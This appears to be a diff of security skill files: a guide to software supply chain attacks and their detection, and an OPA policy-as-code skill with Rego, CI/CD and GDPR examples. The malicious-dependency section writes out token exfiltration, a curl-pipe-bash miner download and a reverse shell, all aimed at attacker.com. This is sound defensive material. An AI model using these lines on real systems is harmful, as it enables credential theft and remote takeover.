<url>https://maven.internal.company.com</url>
</repository>
</repositories>
```
**Mitigation**:
- Use scoped/namespaced packages (@company/package-name)
- Configure package manager to prefer internal registry
- Reserve public names for internal packages
- Implement allowlists for external packages
- Pin dependency versions
### 2. Typosquatting
**MITRE ATT&CK**: T1195.001
**CWE**: CWE-829 (Untrusted Control Sphere)
**Attack Description**:
Malicious packages with names similar to popular packages, relying on typos during installation.
**Real-World Examples**:
- **crossenv** (mimicking cross-env) - 700+ downloads before removal
- **electorn** (mimicking electron) - credential stealer
- **python3-dateutil** (mimicking python-dateutil) - cryptominer
**Common Typosquatting Patterns**:
- Missing/extra character: `reqeusts` vs `requests`
- Substituted character: `requsts` vs `requests`
- Transposed characters: `reqeusts` vs `requests`
- Homoglyphs: `requ𝗲sts` vs `requests` (Unicode lookalikes)
- Namespace confusion: `@npm/lodash` vs `lodash`
**Detection**:
- Levenshtein distance analysis on new dependencies
- Check package popularity and age
- Review package maintainer history
- Verify package repository URL
**Black Duck Detection**:
```python
# Component quality indicators
- Download count (typosquats typically low)
- Creation date (recent for established functionality)
- Maintainer reputation
- GitHub stars/forks (legitimate packages have more)
```
**Prevention**:
- Use dependency lock files (package-lock.json, yarn.lock)
- Code review for new dependencies
- Automated typosquatting detection tools
- IDE autocomplete from verified sources
### 3. Compromised Maintainer Accounts
**MITRE ATT&CK**: T1195.002
**CWE**: CWE-1294 (Insecure Security Identifier)
**Attack Description**:
Attackers gain access to legitimate maintainer accounts through credential compromise, then publish malicious versions.
**Real-World Examples**:
- **event-stream (2018)**: Maintainer handed over to attacker, malicious code added
- **ua-parser-js (2021)**: Hijacked to deploy cryptocurrency miner
- **coa, rc (2021)**: Password spraying attack on maintainer accounts
**Attack Indicators**:
- Unexpected version releases
- New maintainers added
- Changed package repository URLs
- Sudden dependency additions
- Obfuscated code in updates
- Behavioral changes (network calls, file system access)
**Detection with Black Duck**:
```
Monitor for:
- Maintainer changes
- Unusual release patterns
- Security score degradation
- New external dependencies
- Build process changes
```
**Prevention**:
- Enable 2FA/MFA for registry accounts
- Use hardware security keys
- Registry account monitoring/alerts
- Code signing for packages
- Review release process changes
### 4. Malicious Dependencies (Direct Injection)
**MITRE ATT&CK**: T1195.001
**Attack Description**:
Entirely malicious packages created by attackers, often using SEO or social engineering to drive adoption.
**Real-World Examples**:
- **event-stream → flatmap-stream (2018)**: Injected Bitcoin wallet stealer
- **bootstrap-sass (malicious version)**: Credential harvester
- **eslint-scope (2018)**: Credential stealer via compromised account
**Common Malicious Behaviors**:
- Credential harvesting (env vars, config files)
- Cryptocurrency mining
- Backdoor installation
- Data exfiltration
- Command & control communication
**Example Malicious Code Patterns**:
```javascript
// Environment variable exfiltration
const secrets = {
npm_token: process.env.NPM_TOKEN,
aws_key: process.env.AWS_ACCESS_KEY_ID,
github_token: process.env.GITHUB_TOKEN
};
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify(secrets)
});
// Cryptocurrency miner
const { exec } = require('child_process');
exec('curl http://attacker.com/miner.sh | bash');
// Backdoor
const net = require('net');
const { spawn } = require('child_process');
const shell = spawn('/bin/bash', []);
net.connect(4444, 'attacker.com', function() {
this.pipe(shell.stdin);
shell.stdout.pipe(this);
});
```
**Detection**:
- Network activity during install (install scripts shouldn't make external calls)
- File system modifications outside package directory
- Process spawning during installation
- Obfuscated or minified code in source packages
- Suspicious dependencies for package scope
**Black Duck Indicators**:
- Low community adoption for claimed functionality
- Recent creation date
- Lack of GitHub repository or activity
- Poor code quality metrics
- No documentation or minimal README
### 5. Build System Compromise
**MITRE ATT&CK**: T1195.003
**CWE**: CWE-494
**Attack Description**:
Compromising the build or release infrastructure to inject malicious code during the build process.
**Real-World Examples**:
- **SolarWinds (2020)**: Build system compromise led to trojanized software updates
- **Codecov (2021)**: Bash uploader script modified to exfiltrate credentials
**Attack Vectors**:
- Compromised CI/CD credentials
- Malicious CI/CD pipeline configurations
- Compromised build dependencies
- Registry credential theft during build
- Artifact repository compromise
**Detection**:
- Reproducible builds (verify build output matches)
- Build artifact signing and verification
- Supply chain levels for software artifacts (SLSA)
- Build provenance tracking
**Prevention**:
- Secure CI/CD infrastructure
- Minimal build environment (containers)
- Secret management (avoid env vars in logs)
- Build isolation and sandboxing
- SBOM generation at build time
## Detection Strategies
### Static Analysis Indicators
**Package Metadata Analysis**:
```python
# Black Duck provides these metrics
suspicious_indicators = {
"recent_creation": age_days < 30,
"low_adoption": downloads < 100,
"no_repository": github_url == None,
"new_maintainer": maintainer_age < 90,
"version_spike": version > expected + 50,
"abandoned": last_update_days > 730
}
```
### Behavioral Analysis
**Runtime Monitoring**:
- Network connections during install
- File system access outside package directory
- Process spawning (especially child processes)
- Environment variable access
- Encrypted/obfuscated payloads
**Example Detection Script**:
```bash
#!/bin/bash
# Monitor package installation for suspicious behavior
strace -f -e trace=network,process,file npm install suspicious-package 2>&1 | \
grep -E "(connect|sendto|execve|openat)" | \
grep -v "npmjs.org\|yarnpkg.com" # Exclude legitimate registries
# Any network activity to non-registry domains during install is suspicious
```
### Dependency Graph Analysis
**Transitive Dependency Risk**:
```
Your App
├── legitimate-package@1.0.0
│ └── utility-lib@2.0.0 (✓ Safe)
│ └── string-helper@1.0.0 (⚠️ Recently added)
│ └── unknown-package@99.0.0 (❌ SUSPICIOUS)
```
**Black Duck Features**:
- Full dependency tree visualization
- Transitive vulnerability detection
- Component risk scoring
- Supply chain risk assessment
## Prevention and Mitigation
### 1. Dependency Vetting Process
**Before Adding Dependency**:
```markdown
# Dependency Vetting Checklist
- [ ] Active maintenance (commits within 3 months)
- [ ] Sufficient adoption (downloads, GitHub stars)
- [ ] Code repository available and reviewed
- [ ] Recent security audit or assessment
- [ ] Compatible license
- [ ] Minimal transitive dependencies
- [ ] No known vulnerabilities (Black Duck scan)
- [ ] Maintainer reputation verified
- [ ] Reasonable package size
- [ ] Documentation quality adequate
```
**Automated Checks**:
```bash
#!/bin/bash
# Automated dependency vetting
PACKAGE=$1
# Check age and popularity
npm view $PACKAGE time.created downloads
# Check for known vulnerabilities
npm audit
# Black Duck scan
scripts/blackduck_scan.py --project temp-vet --version 1.0.0
# Check for typosquatting
python3 -c "
import Levenshtein
from package_registry import get_popular_packages
popular = get_popular_packages()
for pkg in popular:
distance = Levenshtein.distance('$PACKAGE', pkg)
if distance <= 2:
print(f'⚠️ Similar to {pkg} (distance: {distance})')
"
```
### 2. Dependency Pinning and Lock Files
**Always use lock files**:
```json
// package.json - use exact versions for security-critical deps
{
"dependencies": {
"critical-auth-lib": "1.2.3", // Exact version
"utility-lib": "^2.0.0" // Allow minor updates
}
}
```
**Commit lock files**:
- package-lock.json (npm)
- yarn.lock (Yarn)
- Pipfile.lock (Python)
- Gemfile.lock (Ruby)
- go.sum (Go)
### 3. Subresource Integrity (SRI)
**For CDN-loaded dependencies**:
```html
<!-- Use SRI hashes for external scripts -->
<script
src="https://cdn.example.com/library.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
crossorigin="anonymous">
</script>
```
### 4. Private Package Registry
**Benefits**:
- Control over approved packages
- Caching for availability
- Internal package distribution
- Security scanning integration
**Solutions**:
- Artifactory (JFrog)
- Nexus Repository
- Azure Artifacts
- AWS CodeArtifact
- GitHub Packages
**Configuration Example (npm)**:
```bash
# .npmrc
registry=https://artifactory.company.com/api/npm/npm-virtual/
@company:registry=https://artifactory.company.com/api/npm/npm-internal/
# Always authenticate
always-auth=true
```
### 5. Continuous Monitoring
**Automated Scanning**:
```yaml
# .github/workflows/dependency-scan.yml
name: Dependency Security Scan
on:
schedule:
- cron: '0 0 * * *' # Daily
pull_request:
push:
branches: [main]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Black Duck Scan
run: |
scripts/blackduck_scan.py \
--project ${{ github.repository }} \
--version ${{ github.sha }} \
--fail-on-policy
- name: Check for new dependencies
run: |
git diff origin/main -- package.json | \
grep "^+" | grep -v "^+++" | \
while read line; do
echo "⚠️ New dependency requires review: $line"
done
```
### 6. Runtime Protection
**Application-level**:
```javascript
// Freeze object prototypes to prevent pollution
Object.freeze(Object.prototype);
Object.freeze(Array.prototype);
// Restrict network access for dependencies (if possible)
// Use Content Security Policy (CSP) for web apps
// Monitor unexpected behavior
process.on('warning', (warning) => {
if (warning.name === 'DeprecationWarning') {
// Log and alert on deprecated API usage
securityLog.warn('Deprecated API used', { warning });
}
});
```
**Container-level**:
```dockerfile
# Use minimal base images
FROM node:18-alpine
# Run as non-root
USER node
# Read-only file system where possible
VOLUME /app
WORKDIR /app
# No network access during build
RUN --network=none npm ci
```
## Incident Response
### Detection Phase
**Indicators of Compromise**:
1. Black Duck alerts on component changes
2. Unexpected network traffic from application
3. CPU/memory spikes (cryptocurrency mining)
4. Security tool alerts
5. Credential compromise reports
6. Customer reports of suspicious behavior
### Containment
**Immediate Actions**:
1. **Isolate**: Remove affected application from network
2. **Inventory**: Identify all systems using compromised dependency
3. **Block**: Add malicious package to blocklist
4. **Rotate**: Rotate all credentials that may have been exposed
```bash
# Emergency response script
#!/bin/bash
MALICIOUS_PACKAGE=$1
# 1. Block package in registry
curl -X POST https://artifactory/api/blocklist \
-d "{\"package\": \"$MALICIOUS_PACKAGE\"}"
# 2. Find all projects using it
find /repos -name package.json -exec \
grep -l "$MALICIOUS_PACKAGE" {} \;
# 3. Emergency notification
send_alert "CRITICAL: Supply chain compromise detected - $MALICIOUS_PACKAGE"
# 4. Rotate secrets
./rotate_all_credentials.sh
# 5. Re-scan all projects
for project in $(get_all_projects); do
scripts/blackduck_scan.py --project $project --emergency-scan
done
```
### Eradication
1. **Remove** malicious dependency
2. **Replace** with safe alternative or version
3. **Re-scan** with Black Duck to confirm
4. **Review** logs for malicious activity
5. **Rebuild** from clean state
### Recovery
1. **Deploy** patched version
2. **Monitor** for continued malicious activity
3. **Verify** integrity of application
4. **Restore** from backup if necessary
### Post-Incident
**Root Cause Analysis**:
- How did malicious package enter supply chain?
- What controls failed?
- What was the impact?
**Improvements**:
- Update vetting procedures
- Enhance monitoring
- Additional training
- Technical controls
## Tools and Resources
**Detection Tools**:
- **Synopsys Black Duck**: Comprehensive SCA with supply chain risk
- **Socket.dev**: Real-time supply chain attack detection
- **Snyk**: Vulnerability and license scanning
- **Checkmarx SCA**: Software composition analysis
**Best Practices**:
- [CISA Supply Chain Guidance](https://www.cisa.gov/supply-chain)
- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)
- [SLSA Framework](https://slsa.dev/)
- [OWASP Dependency Check](https://owasp.org/www-project-dependency-check/)
**Incident Databases**:
- [Supply Chain Compromises](https://github.com/IQTLabs/software-supply-chain-compromises)
- [Backstabber's Knife Collection](https://dasfreak.github.io/Backstabbers-Knife-Collection/)
## References
- [Sonatype 2022 State of Software Supply Chain](https://www.sonatype.com/state-of-the-software-supply-chain)
- [MITRE ATT&CK - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)
- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)
- [Linux Foundation - Securing the Software Supply Chain](https://www.linuxfoundation.org/resources/publications/securing-the-software-supply-chain)

View File

@@ -0,0 +1,5 @@
# Compliance & Auditing Skills
This directory contains skills for security compliance and auditing operations.
See the main [README.md](../../README.md) for usage and [CONTRIBUTE.md](../../CONTRIBUTE.md) for contribution guidelines.

View File

@@ -0,0 +1,431 @@
---
name: policy-opa
description: >
Policy-as-code enforcement and compliance validation using Open Policy Agent (OPA).
Use when: (1) Enforcing security and compliance policies across infrastructure and applications,
(2) Validating Kubernetes admission control policies, (3) Implementing policy-as-code for
compliance frameworks (SOC2, PCI-DSS, GDPR, HIPAA), (4) Testing and evaluating OPA Rego policies,
(5) Integrating policy checks into CI/CD pipelines, (6) Auditing configuration drift against
organizational security standards, (7) Implementing least-privilege access controls.
version: 0.1.0
maintainer: SirAppSec
category: compliance
tags: [opa, policy-as-code, compliance, rego, kubernetes, admission-control, soc2, gdpr, pci-dss, hipaa]
frameworks: [SOC2, PCI-DSS, GDPR, HIPAA, NIST, ISO27001]
dependencies:
tools: [opa, docker, kubectl]
packages: [jq, yq]
references:
- https://www.openpolicyagent.org/docs/latest/
- https://www.openpolicyagent.org/docs/latest/policy-language/
- https://www.conftest.dev/
---
# Policy-as-Code with Open Policy Agent
## Overview
This skill enables policy-as-code enforcement using Open Policy Agent (OPA) for compliance validation, security policy enforcement, and configuration auditing. OPA provides a unified framework for policy evaluation across cloud-native environments, Kubernetes, CI/CD pipelines, and infrastructure-as-code.
Use OPA to codify security requirements, compliance controls, and organizational standards as executable policies written in Rego. Automatically validate configurations, prevent misconfigurations, and maintain continuous compliance.
## Quick Start
### Install OPA
```bash
# macOS
brew install opa
# Linux
curl -L -o opa https://openpolicyagent.org/downloads/latest/opa_linux_amd64
chmod +x opa
# Verify installation
opa version
```
### Basic Policy Evaluation
```bash
# Evaluate a policy against input data
opa eval --data policy.rego --input input.json 'data.example.allow'
# Test policies with unit tests
opa test policy.rego policy_test.rego --verbose
# Run OPA server for live policy evaluation
opa run --server --addr localhost:8181
```
## Core Workflow
### Step 1: Define Policy Requirements
Identify compliance requirements and security controls to enforce:
- Compliance frameworks (SOC2, PCI-DSS, GDPR, HIPAA, NIST)
- Kubernetes security policies (pod security, RBAC, network policies)
- Infrastructure-as-code policies (Terraform, CloudFormation)
- Application security policies (API authorization, data access)
- Organizational security standards
### Step 2: Write OPA Rego Policies
Create policy files in Rego language. Use the provided templates in `assets/` for common patterns:
**Example: Kubernetes Pod Security Policy**
```rego
package kubernetes.admission
import future.keywords.contains
import future.keywords.if
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged containers are not allowed: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root: %v", [container.name])
}
```
**Example: Compliance Control Validation (SOC2)**
```rego
package compliance.soc2
import future.keywords.if
# CC6.1: Logical and physical access controls
deny[msg] {
input.kind == "Deployment"
not input.spec.template.metadata.labels["data-classification"]
msg := "SOC2 CC6.1: All deployments must have data-classification label"
}
# CC6.6: Encryption in transit
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
msg := "SOC2 CC6.6: LoadBalancer services must use SSL/TLS encryption"
}
```
### Step 3: Test Policies with Unit Tests
Write comprehensive tests for policy validation:
```rego
package kubernetes.admission_test
import data.kubernetes.admission
test_deny_privileged_container {
input := {
"request": {
"kind": {"kind": "Pod"},
"object": {
"spec": {
"containers": [{
"name": "nginx",
"securityContext": {"privileged": true}
}]
}
}
}
}
count(admission.deny) > 0
}
test_allow_unprivileged_container {
input := {
"request": {
"kind": {"kind": "Pod"},
"object": {
"spec": {
"containers": [{
"name": "nginx",
"securityContext": {"privileged": false, "runAsNonRoot": true}
}]
}
}
}
}
count(admission.deny) == 0
}
```
Run tests:
```bash
opa test . --verbose
```
### Step 4: Evaluate Policies Against Configuration
Use the bundled evaluation script for policy validation:
```bash
# Evaluate single file
./scripts/evaluate_policy.py --policy policies/ --input config.yaml
# Evaluate directory of configurations
./scripts/evaluate_policy.py --policy policies/ --input configs/ --recursive
# Output results in JSON format for CI/CD integration
./scripts/evaluate_policy.py --policy policies/ --input config.yaml --format json
```
Or use OPA directly:
```bash
# Evaluate with formatted output
opa eval --data policies/ --input config.yaml --format pretty 'data.compliance.violations'
# Bundle evaluation for complex policies
opa eval --bundle policies.tar.gz --input config.yaml 'data'
```
### Step 5: Integrate with CI/CD Pipelines
Add policy validation to your CI/CD workflow:
**GitHub Actions Example:**
```yaml
- name: Validate Policies
uses: open-policy-agent/setup-opa@v2
with:
version: latest
- name: Run Policy Tests
run: opa test policies/ --verbose
- name: Evaluate Configuration
run: |
opa eval --data policies/ --input deployments/ \
--format pretty 'data.compliance.violations' > violations.json
if [ $(jq 'length' violations.json) -gt 0 ]; then
echo "Policy violations detected!"
cat violations.json
exit 1
fi
```
**GitLab CI Example:**
```yaml
policy-validation:
image: openpolicyagent/opa:latest
script:
- opa test policies/ --verbose
- opa eval --data policies/ --input configs/ --format pretty 'data.compliance.violations'
artifacts:
reports:
junit: test-results.xml
```
### Step 6: Deploy as Kubernetes Admission Controller
Enforce policies at cluster level using OPA Gatekeeper:
```bash
# Install OPA Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/deploy/gatekeeper.yaml
# Apply constraint template
kubectl apply -f assets/k8s-constraint-template.yaml
# Apply constraint
kubectl apply -f assets/k8s-constraint.yaml
# Test admission control
kubectl apply -f test-pod.yaml # Should be denied if violates policy
```
### Step 7: Monitor Policy Compliance
Generate compliance reports using the bundled reporting script:
```bash
# Generate compliance report
./scripts/generate_report.py --policy policies/ --audit-logs audit.json --output compliance-report.html
# Export violations for SIEM integration
./scripts/generate_report.py --policy policies/ --audit-logs audit.json --format json --output violations.json
```
## Security Considerations
- **Policy Versioning**: Store policies in version control with change tracking and approval workflows
- **Least Privilege**: Grant minimal permissions for policy evaluation - OPA should run with read-only access to configurations
- **Sensitive Data**: Avoid embedding secrets in policies - use external data sources or encrypted configs
- **Audit Logging**: Log all policy evaluations, violations, and exceptions for compliance auditing
- **Policy Testing**: Maintain comprehensive test coverage (>80%) for all policy rules
- **Separation of Duties**: Separate policy authors from policy enforcers; require peer review for policy changes
- **Compliance Mapping**: Map policies to specific compliance controls (SOC2 CC6.1, PCI-DSS 8.2.1) for audit traceability
## Bundled Resources
### Scripts (`scripts/`)
- `evaluate_policy.py` - Evaluate OPA policies against configuration files with formatted output
- `generate_report.py` - Generate compliance reports from policy evaluation results
- `test_policies.sh` - Run OPA policy unit tests with coverage reporting
### References (`references/`)
- `rego-patterns.md` - Common Rego patterns for security and compliance policies
- `compliance-frameworks.md` - Policy templates mapped to SOC2, PCI-DSS, GDPR, HIPAA controls
- `kubernetes-security.md` - Kubernetes security policies and admission control patterns
- `iac-policies.md` - Infrastructure-as-code policy validation for Terraform, CloudFormation
### Assets (`assets/`)
- `k8s-pod-security.rego` - Kubernetes pod security policy template
- `k8s-constraint-template.yaml` - OPA Gatekeeper constraint template
- `k8s-constraint.yaml` - Example Gatekeeper constraint configuration
- `soc2-compliance.rego` - SOC2 compliance controls as OPA policies
- `pci-dss-compliance.rego` - PCI-DSS requirements as OPA policies
- `gdpr-compliance.rego` - GDPR data protection policies
- `terraform-security.rego` - Terraform security best practices policies
- `ci-cd-pipeline.yaml` - CI/CD integration examples (GitHub Actions, GitLab CI)
## Common Patterns
### Pattern 1: Kubernetes Admission Control
Enforce security policies at pod creation time:
```rego
package kubernetes.admission
deny[msg] {
input.request.kind.kind == "Pod"
not input.request.object.spec.securityContext.runAsNonRoot
msg := "Pods must run as non-root user"
}
```
### Pattern 2: Infrastructure-as-Code Validation
Validate Terraform configurations before apply:
```rego
package terraform.security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not resource.change.after.server_side_encryption_configuration
msg := sprintf("S3 bucket %v must have encryption enabled", [resource.name])
}
```
### Pattern 3: Compliance Framework Mapping
Map policies to specific compliance controls:
```rego
package compliance.soc2
# SOC2 CC6.1: Logical and physical access controls
cc6_1_violations[msg] {
input.kind == "RoleBinding"
input.roleRef.name == "cluster-admin"
msg := sprintf("SOC2 CC6.1 VIOLATION: cluster-admin binding for %v", [input.metadata.name])
}
```
### Pattern 4: Data Classification Enforcement
Enforce data handling policies based on classification:
```rego
package data.classification
deny[msg] {
input.metadata.labels["data-classification"] == "restricted"
input.spec.template.spec.volumes[_].hostPath
msg := "Restricted data cannot use hostPath volumes"
}
```
### Pattern 5: API Authorization Policies
Implement attribute-based access control (ABAC):
```rego
package api.authz
import future.keywords.if
allow if {
input.method == "GET"
input.path[0] == "public"
}
allow if {
input.method == "GET"
input.user.role == "admin"
}
allow if {
input.method == "POST"
input.user.role == "editor"
input.resource.owner == input.user.id
}
```
## Integration Points
- **CI/CD Pipelines**: GitHub Actions, GitLab CI, Jenkins, CircleCI - validate policies before deployment
- **Kubernetes**: OPA Gatekeeper admission controller for runtime policy enforcement
- **Terraform/IaC**: Pre-deployment validation using `conftest` or OPA CLI
- **API Gateways**: Kong, Envoy, NGINX - authorize requests using OPA policies
- **Monitoring/SIEM**: Export policy violations to Splunk, ELK, Datadog for security monitoring
- **Compliance Tools**: Integrate with compliance platforms for control validation and audit trails
## Troubleshooting
### Issue: Policy Evaluation Returns Unexpected Results
**Solution**:
- Enable trace mode: `opa eval --data policy.rego --input input.json --explain full 'data.example.allow'`
- Validate input data structure matches policy expectations
- Check for typos in policy rules or variable names
- Use `opa fmt` to format policies and catch syntax errors
### Issue: Kubernetes Admission Control Not Blocking Violations
**Solution**:
- Verify Gatekeeper is running: `kubectl get pods -n gatekeeper-system`
- Check constraint status: `kubectl get constraints`
- Review audit logs: `kubectl logs -n gatekeeper-system -l control-plane=controller-manager`
- Ensure constraint template is properly defined and matches policy expectations
### Issue: Policy Tests Failing
**Solution**:
- Run tests with verbose output: `opa test . --verbose`
- Check test input data matches expected format
- Verify policy package names match between policy and test files
- Use `print()` statements in Rego for debugging
### Issue: Performance Degradation with Large Policy Sets
**Solution**:
- Use policy bundles: `opa build policies/ -o bundle.tar.gz`
- Enable partial evaluation for complex policies
- Optimize policy rules to reduce computational complexity
- Index data for faster lookups using `input.key` patterns
- Consider splitting large policy sets into separate evaluation domains
## References
- [OPA Documentation](https://www.openpolicyagent.org/docs/latest/)
- [Rego Language Reference](https://www.openpolicyagent.org/docs/latest/policy-language/)
- [OPA Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/)
- [Conftest](https://www.conftest.dev/)
- [OPA Kubernetes Tutorial](https://www.openpolicyagent.org/docs/latest/kubernetes-tutorial/)
- [SOC2 Security Controls](https://www.aicpa.org/interestareas/frc/assuranceadvisoryservices/aicpasoc2report.html)
- [PCI-DSS Requirements](https://www.pcisecuritystandards.org/)
- [GDPR Compliance Guide](https://gdpr.eu/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,234 @@
# GitHub Actions CI/CD Pipeline with OPA Policy Validation
name: OPA Policy Validation
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main ]
jobs:
# Test OPA policies with unit tests
test-policies:
name: Test OPA Policies
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
with:
version: latest
- name: Run Policy Tests
run: |
opa test policies/ --verbose --coverage
opa test policies/ --coverage --format=json > coverage.json
- name: Check Coverage Threshold
run: |
COVERAGE=$(jq -r '.coverage' coverage.json | awk '{print int($1)}')
if [ "$COVERAGE" -lt 80 ]; then
echo "Coverage $COVERAGE% is below threshold 80%"
exit 1
fi
echo "Coverage: $COVERAGE%"
# Validate Kubernetes manifests
validate-kubernetes:
name: Validate Kubernetes Configs
runs-on: ubuntu-latest
needs: test-policies
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: Validate Kubernetes Manifests
run: |
for file in k8s/**/*.yaml; do
echo "Validating $file"
opa eval --data policies/ --input "$file" \
--format pretty 'data.kubernetes.admission.deny' \
> violations.txt
if [ -s violations.txt ]; then
echo "Policy violations found in $file:"
cat violations.txt
exit 1
fi
done
- name: Generate Validation Report
if: always()
run: |
./scripts/generate_report.py \
--policy policies/ \
--audit-logs violations.json \
--format html \
--output validation-report.html
- name: Upload Report
if: always()
uses: actions/upload-artifact@v3
with:
name: validation-report
path: validation-report.html
# Validate Terraform configurations
validate-terraform:
name: Validate Terraform Configs
runs-on: ubuntu-latest
needs: test-policies
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup Terraform
uses: hashicorp/setup-terraform@v2
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: Terraform Init
run: terraform init
- name: Generate Terraform Plan
run: |
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json
- name: Validate with OPA
run: |
opa eval --data policies/terraform/ --input tfplan.json \
--format pretty 'data.terraform.security.deny' \
> terraform-violations.json
if [ -s terraform-violations.json ]; then
echo "Terraform policy violations detected:"
cat terraform-violations.json
exit 1
fi
# Compliance validation for production
compliance-check:
name: Compliance Validation
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
needs: [validate-kubernetes, validate-terraform]
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: SOC2 Compliance Check
run: |
opa eval --data policies/compliance/soc2-compliance.rego \
--input deployments/ \
--format json 'data.compliance.soc2.deny' \
> soc2-violations.json
- name: PCI-DSS Compliance Check
run: |
opa eval --data policies/compliance/pci-dss-compliance.rego \
--input deployments/ \
--format json 'data.compliance.pci.deny' \
> pci-violations.json
- name: GDPR Compliance Check
run: |
opa eval --data policies/compliance/gdpr-compliance.rego \
--input deployments/ \
--format json 'data.compliance.gdpr.deny' \
> gdpr-violations.json
- name: Generate Compliance Report
run: |
./scripts/generate_report.py \
--policy policies/compliance/ \
--audit-logs soc2-violations.json \
--format html \
--output compliance-report.html
- name: Upload Compliance Report
uses: actions/upload-artifact@v3
with:
name: compliance-report
path: compliance-report.html
- name: Fail on Violations
run: |
TOTAL_VIOLATIONS=$(cat *-violations.json | jq -s 'map(length) | add')
if [ "$TOTAL_VIOLATIONS" -gt 0 ]; then
echo "Found $TOTAL_VIOLATIONS compliance violations"
exit 1
fi
---
# GitLab CI/CD Pipeline Example
# .gitlab-ci.yml
stages:
- test
- validate
- compliance
variables:
OPA_VERSION: "latest"
test-policies:
stage: test
image: openpolicyagent/opa:${OPA_VERSION}
script:
- opa test policies/ --verbose --coverage
- opa test policies/ --format=json --coverage > coverage.json
artifacts:
reports:
coverage_report:
coverage_format: cobertura
path: coverage.json
validate-kubernetes:
stage: validate
image: openpolicyagent/opa:${OPA_VERSION}
script:
- |
for file in k8s/**/*.yaml; do
opa eval --data policies/ --input "$file" \
'data.kubernetes.admission.deny' || exit 1
done
only:
- merge_requests
- main
validate-terraform:
stage: validate
image: hashicorp/terraform:latest
before_script:
- apk add --no-cache curl jq
- curl -L -o /usr/local/bin/opa https://openpolicyagent.org/downloads/latest/opa_linux_amd64
- chmod +x /usr/local/bin/opa
script:
- terraform init
- terraform plan -out=tfplan.binary
- terraform show -json tfplan.binary > tfplan.json
- opa eval --data policies/terraform/ --input tfplan.json 'data.terraform.security.deny'
only:
- merge_requests
- main
compliance-check:
stage: compliance
image: openpolicyagent/opa:${OPA_VERSION}
script:
- opa eval --data policies/compliance/ --input deployments/ 'data.compliance'
artifacts:
reports:
junit: compliance-report.xml
only:
- main

View File

@@ -0,0 +1,159 @@
package compliance.gdpr
import future.keywords.if
# GDPR Article 25: Data Protection by Design and by Default
# Require data classification labels
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.labels["data-classification"]
msg := {
"control": "GDPR Article 25",
"severity": "high",
"violation": sprintf("Deployment processing personal data requires classification: %v", [input.metadata.name]),
"remediation": "Add label: data-classification=personal|sensitive|public",
}
}
# Data minimization - limit replicas for personal data
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["data-type"] == "personal"
input.spec.replicas > 3
not input.metadata.annotations["gdpr.justification"]
msg := {
"control": "GDPR Article 25",
"severity": "medium",
"violation": sprintf("Excessive replicas for personal data: %v", [input.metadata.name]),
"remediation": "Reduce replicas or add justification annotation",
}
}
# Require purpose limitation annotation
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.annotations["data-purpose"]
msg := {
"control": "GDPR Article 25",
"severity": "medium",
"violation": sprintf("Personal data deployment requires purpose annotation: %v", [input.metadata.name]),
"remediation": "Add annotation: data-purpose=<specific purpose>",
}
}
processes_personal_data(resource) {
resource.metadata.labels["data-type"] == "personal"
}
processes_personal_data(resource) {
resource.metadata.labels["data-type"] == "pii"
}
processes_personal_data(resource) {
contains(lower(resource.metadata.name), "user")
}
# GDPR Article 32: Security of Processing
# Require encryption for personal data volumes
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["volume.encryption.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"severity": "high",
"violation": sprintf("Personal data volume requires encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption",
}
}
# Require TLS for personal data services
deny[msg] {
input.kind == "Service"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"severity": "high",
"violation": sprintf("Personal data service requires TLS: %v", [input.metadata.name]),
"remediation": "Enable TLS encryption",
}
}
# Require pseudonymization or anonymization
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.annotations["data-protection.method"]
msg := {
"control": "GDPR Article 32",
"severity": "medium",
"violation": sprintf("Personal data deployment requires protection method: %v", [input.metadata.name]),
"remediation": "Add annotation: data-protection.method=pseudonymization|anonymization|encryption",
}
}
# GDPR Article 33: Breach Notification
# Require incident response plan
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
input.metadata.namespace == "production"
not input.metadata.annotations["incident-response.plan"]
msg := {
"control": "GDPR Article 33",
"severity": "medium",
"violation": sprintf("Production personal data deployment requires incident response plan: %v", [input.metadata.name]),
"remediation": "Add annotation: incident-response.plan=<plan-id>",
}
}
